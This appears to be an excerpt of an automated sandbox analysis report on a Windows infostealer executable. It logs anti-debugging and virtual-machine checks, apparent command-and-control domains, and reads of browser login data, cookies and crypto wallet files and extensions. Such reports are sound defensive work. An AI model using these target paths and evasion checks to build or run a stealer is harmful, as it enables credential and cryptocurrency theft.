                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B072B second address: 56B072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B072F second address: 56B0733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0118 second address: 56B0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8BFFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BB2 second address: 56B0BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BB6 second address: 56B0BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BBC second address: 56B0BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5D692C6EECh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BDF second address: 56B0BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0BE3 second address: 56B0C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, C8D7h 0x0000000a popad 0x0000000b cmp dword ptr [75AF459Ch], 05h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5D692C6EF9h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56B0C9F second address: 56B0CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D68C8C001h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 4FEB1C4Eh 0x00000010 jmp 00007F5D68C8BFFEh 0x00000015 call 00007F5DD9070E9Fh 0x0000001a push 75A92B70h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 mov eax, dword ptr [esp+10h] 0x0000002a mov dword ptr [esp+10h], ebp 0x0000002e lea ebp, dword ptr [esp+10h] 0x00000032 sub esp, eax 0x00000034 push ebx 0x00000035 push esi 0x00000036 push edi 0x00000037 mov eax, dword ptr [75AF4538h] 0x0000003c xor dword ptr [ebp-04h], eax 0x0000003f xor eax, ebp 0x00000041 push eax 0x00000042 mov dword ptr [ebp-18h], esp 0x00000045 push dword ptr [ebp-08h] 0x00000048 mov eax, dword ptr [ebp-04h] 0x0000004b mov dword ptr [ebp-04h], FFFFFFFEh 0x00000052 mov dword ptr [ebp-08h], eax 0x00000055 lea eax, dword ptr [ebp-10h] 0x00000058 mov dword ptr fs:[00000000h], eax 0x0000005e ret 0x0000005f push eax 0x00000060 push edx 0x00000061 pushad 0x00000062 mov eax, edx 0x00000064 popad 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0982 second address: 56C09D5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5D692C6EF8h 0x00000008 or si, EE18h 0x0000000d jmp 00007F5D692C6EEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 jmp 00007F5D692C6EF2h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5D692C6EEEh 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09D5 second address: 56C09DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09DB second address: 56C09DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09DF second address: 56C09E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C09E3 second address: 56C0A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D692C6EF4h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B3B second address: 56C0B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B3F second address: 56C0B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D692C6EECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B94 second address: 56C0B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B9A second address: 56C0B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0B9E second address: 56C0BA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BA2 second address: 56C0BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D692C6EEDh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BBA second address: 56C0BCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D68C8BFFCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BCA second address: 56C0BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRDTSC instruction interceptor: First address: 56C0BCE second address: 56C0BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop ebx 0x0000000e mov esi, 4D972A2Bh 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSpecial instruction interceptor: First address: FF7C49 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSpecial instruction interceptor: First address: 11AAF67 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSpecial instruction interceptor: First address: 122A6AB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exe TID: 1476Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exe TID: 1352Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: FjFeChttqA.exe, 00000000.00000002.2263066813.0000000001179000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: FjFeChttqA.exe, FjFeChttqA.exe, 00000000.00000003.2180512483.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264288867.0000000001887000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000002.2264382430.00000000018B9000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2262167360.0000000001887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: FjFeChttqA.exe, 00000000.00000002.2263066813.0000000001179000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: FjFeChttqA.exe, 00000000.00000003.2130562854.00000000060CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\FjFeChttqA.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\FjFeChttqA.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\FjFeChttqA.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: SICE
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\FjFeChttqA.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: FjFeChttqA.exe, 00000000.00000003.2057854573.0000000005530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: steppriflej.xyz
                Source: FjFeChttqA.exe, 00000000.00000003.2057854573.0000000005530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sendypaster.xyz
                Source: FjFeChttqA.exe, 00000000.00000003.2057854573.0000000005530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: cuddlyready.xyz
                Source: FjFeChttqA.exe, 00000000.00000002.2263299094.00000000011C1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: jProgram Manager
                Source: C:\Users\user\Desktop\FjFeChttqA.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: FjFeChttqA.exe, 00000000.00000003.2205898368.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2218952789.00000000060AE000.00000004.00000800.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2201681034.00000000018B8000.00000004.00000020.00020000.00000000.sdmp, FjFeChttqA.exe, 00000000.00000003.2256533273.00000000018B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\FjFeChttqA.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: FjFeChttqA.exe PID: 5568, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: FjFeChttqA.exeString found in binary or memory: Wallets/Electrum
                Source: FjFeChttqA.exeString found in binary or memory: Wallets/ElectronCash
                Source: FjFeChttqA.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: FjFeChttqA.exeString found in binary or memory: window-state.json
                Source: FjFeChttqA.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FjFeChttqA.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FjFeChttqA.exeString found in binary or memory: Wallets/Ethereum
                Source: FjFeChttqA.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: FjFeChttqA.exe, 00000000.00000003.2180485031.000000000191D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\FjFeChttqA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
